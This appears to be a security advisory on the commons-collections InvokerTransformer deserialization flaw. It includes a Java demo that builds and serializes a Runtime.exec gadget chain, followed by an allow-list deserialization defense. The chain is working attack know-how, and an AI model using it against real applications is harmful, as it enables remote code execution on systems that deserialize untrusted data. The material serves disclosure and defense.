Severity
CVSS: 9.3
Description
Arbitrary remote code execution with InvokerTransformer.
Explanation
Due to the behavior of InvokerTransformer, an arbitrary code execution attack may be executed against any application that deserializes user-supplied objects while commons-collections is on the classpath. The intended behavior of InvokerTransformer is to allow the invocation, through Java reflection, of any method of any class on the Java classpath. Because the InvokerTransformer class implements Serializable, it can be included in a serialized object. The combination of InvokerTransformer's intended functionality and its serializability allows an attacker to embed malicious content in the serialized stream, such as a reflective call to Runtime.getRuntime().exec(), resulting in arbitrary code execution.
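The following program shows the mechanism described above in working code. It is an added example, not code from the advisory or from the commons-collections project, and it assumes commons-collections 3.2.1 (a version that still serializes its functors) on the classpath and a POSIX system where the command "true" exists. A ChainedTransformer of ConstantTransformer and InvokerTransformer steps walks reflectively from Runtime.class to Runtime.getRuntime().exec(cmd); the chain survives a serialize/deserialize round trip and runs the command when transform() is called on the restored object.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class InvokerTransformerDemo {

    // Builds a Transformer chain that, when transform() is called with any
    // input, reflectively resolves Runtime.getRuntime() and calls exec(cmd).
    // Each InvokerTransformer step calls the named method on the output of
    // the previous step; no step references Runtime directly except the first.
    static Transformer buildChain(String cmd) {
        Transformer[] steps = new Transformer[] {
            // step 1: ignore the input, emit the Class object for Runtime
            new ConstantTransformer(Runtime.class),
            // step 2: Runtime.class.getMethod("getRuntime") -> Method
            new InvokerTransformer("getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "getRuntime", new Class[0] }),
            // step 3: method.invoke(null) -> Runtime instance
            new InvokerTransformer("invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[0] }),
            // step 4: runtime.exec(cmd) -> Process
            new InvokerTransformer("exec",
                new Class[] { String.class },
                new Object[] { cmd })
        };
        return new ChainedTransformer(steps);
    }

    // Plain Java serialization: this is what an attacker ships to the target.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Plain deserialization with no class filtering, as a vulnerable
    // application would do on untrusted input.
    static Object deserialize(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Benign command chosen for the demonstration (assumes a POSIX system).
        Transformer chain = buildChain("true");

        byte[] payload = serialize(chain);
        System.out.println("serialized chain: " + payload.length + " bytes");

        // The restored chain is fully functional: calling it executes the command.
        Transformer restored = (Transformer) deserialize(payload);
        Process p = (Process) restored.transform(null);
        System.out.println("command exit status: " + p.waitFor());
    }
}
```

Note the caveat: in this demonstration transform() is called explicitly after readObject() returns. Deserializing the chain by itself does not invoke it; a complete attack against a real application needs the stream to also contain an object whose deserialization ends up calling the transformer, which is outside what the advisory describes.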
Detection
The application is vulnerable if it deserializes untrusted data (for example Java serialized objects received over the network or read from user-controlled storage) while a vulnerable commons-collections jar is on its classpath.
Recommendation
The project is actively working on a new release to address this issue. Upgrading to a non-vulnerable version is not possible at this time. A potential workaround is to remove commons-collections from the classpath or to remove the InvokerTransformer class from the commons-collections jar file.

Note: This is not specifically a commons-collections issue. Any serializable object that allows reflection (dynamic method invocation) or execution of dangerous functionality will be subject to the same exploit.
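Because the note above applies to any serializable class with dangerous behavior, a defense that targets only InvokerTransformer is incomplete. One generic hardening is to allow-list the classes a given stream is permitted to contain, so that unexpected classes are rejected before they are instantiated. The following is an added example, not code from the advisory or the commons-collections project; it overrides ObjectInputStream.resolveClass (available on every Java version; Java 9 and later also offer ObjectInputFilter for the same purpose), uses a constructed allow-list for a stream expected to carry a list of integers, and assumes commons-collections 3.2.1 on the classpath only to show the rejection.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import org.apache.commons.collections.functors.InvokerTransformer;

public class AllowListObjectInputStream extends ObjectInputStream {

    // Classes this particular stream is expected to carry. Constructed for
    // the example; a real application lists its own data-transfer types.
    // Superclasses that take part in serialization (java.lang.Number for
    // Integer) must be listed too, since resolveClass sees their descriptors.
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
        "java.util.ArrayList",
        "java.lang.Integer",
        "java.lang.Number"));

    public AllowListObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    // Called for every class descriptor in the stream before any instance
    // of that class is created, so a gadget is refused before it exists.
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!ALLOWED.contains(name)) {
            throw new InvalidClassException(name, "class not on the deserialization allow-list");
        }
        return super.resolveClass(desc);
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object readChecked(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new AllowListObjectInputStream(new ByteArrayInputStream(bytes))) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // The expected payload shape passes the filter.
        byte[] ok = serialize(new ArrayList<>(Arrays.asList(1, 2, 3)));
        System.out.println("accepted: " + readChecked(ok));

        // A serialized InvokerTransformer is rejected at its class descriptor,
        // before any of its fields are read or the object is constructed.
        byte[] gadget = serialize(new InvokerTransformer("exec",
            new Class[] { String.class }, new Object[] { "true" }));
        try {
            readChecked(gadget);
            System.out.println("ERROR: gadget was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.classname + " (" + e.getMessage() + ")");
        }
    }
}
```

An allow-list is preferable to a deny-list of known gadget classes: the advisory's own note makes clear that other serializable classes with reflective or otherwise dangerous behavior are subject to the same attack, and a deny-list must be updated for each of them. Where the application does not actually need Java serialization of untrusted input, removing that code path entirely is the stronger fix.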
Categories
Data, Functional